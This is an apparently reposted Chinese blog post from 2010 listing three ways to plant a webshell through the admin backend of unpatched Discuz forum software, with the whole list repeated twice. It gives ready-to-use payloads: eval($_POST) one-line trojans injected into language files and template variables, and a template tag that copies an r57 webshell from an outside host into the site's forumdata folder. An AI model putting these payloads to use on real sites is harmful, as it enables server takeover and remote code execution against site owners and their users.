discuz后台拿shell几种方法 不指定
时间:2010-07-15 来源:xuequansongmo
discuz后台拿shell几种方法:前提是discuz没打补丁
==========================================
(1) discuz 6.x 此方法需要创始人账号:
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:
1.后台编辑 customfaq(customfaq.lang.php文件)
在eval($_POST[c]);
2.后台编辑 misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
";eval($_POST[c]);"
在 前台回帖处选择引用回复。
==========================================
(2)discuz 7.0以下版本 此方法需要管理员权限账号:
以管理员身份进后台之后访问/admincp.php?action=styles&operation=edit&id=1&adv=1
然 后新增模板变量,变量的地方填XXX', '#999');eval($_POST[cmd]);//
替换内容随便输入:xxxx,然后提交,一 句话木马就产生了:
/forumdata/cache/style_1.php 这个1和模板id对应,模板id是几就是几
这个一句话密 码是大写的CMD #beach注:此方法最好用
==========================================
(3) 目前通吃所有discuz版本。
1. 随便选一模板文件,选择编辑
2. 找一个空间上传一个webshell, 假定其地址为http://www.anti-sec.cn/fucker/r57.txt
3. 在任意位置输入:
{eval copy('http://www.anti-sec.cn/fucker/r57.txt', DISCUZ_ROOT.'./forumdata/shell.php');}
4. 保存, 刷新
5. 访问该模板所属的文件
6. 把模板恢复原样
大功告成, 访问/forumdata/shell.php便是马。#beach注:此方法我没用过
==========================================
(1) discuz 6.x 此方法需要创始人账号:
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:
1.后台编辑 customfaq(customfaq.lang.php文件)
在eval($_POST[c]);
2.后台编辑 misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
";eval($_POST[c]);"
在 前台回帖处选择引用回复。
==========================================
(2)discuz 7.0以下版本 此方法需要管理员权限账号:
以管理员身份进后台之后访问/admincp.php?action=styles&operation=edit&id=1&adv=1
然 后新增模板变量,变量的地方填XXX', '#999');eval($_POST[cmd]);//
替换内容随便输入:xxxx,然后提交,一 句话木马就产生了:
/forumdata/cache/style_1.php 这个1和模板id对应,模板id是几就是几
这个一句话密 码是大写的CMD #beach注:此方法最好用
==========================================
(3) 目前通吃所有discuz版本。
1. 随便选一模板文件,选择编辑
2. 找一个空间上传一个webshell, 假定其地址为http://www.anti-sec.cn/fucker/r57.txt
3. 在任意位置输入:
{eval copy('http://www.anti-sec.cn/fucker/r57.txt', DISCUZ_ROOT.'./forumdata/shell.php');}
4. 保存, 刷新
5. 访问该模板所属的文件
6. 把模板恢复原样
大功告成, 访问/forumdata/shell.php便是马。#beach注:此方法我没用过
相关阅读 更多 +
